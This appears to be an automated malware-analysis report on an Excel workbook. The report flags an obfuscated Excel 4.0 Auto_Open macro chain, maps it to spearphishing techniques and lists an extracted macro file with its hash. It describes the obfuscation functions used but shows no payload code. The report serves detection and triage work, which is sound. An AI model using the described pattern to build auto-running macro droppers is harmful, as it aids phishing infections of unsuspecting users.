Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains an Excel 4.0 macro sheet with an Auto_Open entry that is heavily obfuscated using chained formula and character functions. This obfuscation suggests an attempt to hide malicious code, likely intended to download and execute a secondary payload. The presence of an Auto_Open macro indicates it is designed to be delivered as a spearphishing attachment.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129377 bytes |

SHA-256: 7bd902d873232967410161f7ec002cff5ccef284b4ceecca1fecdc8737b26c31
Preview script: first 1,000 lines of the extracted script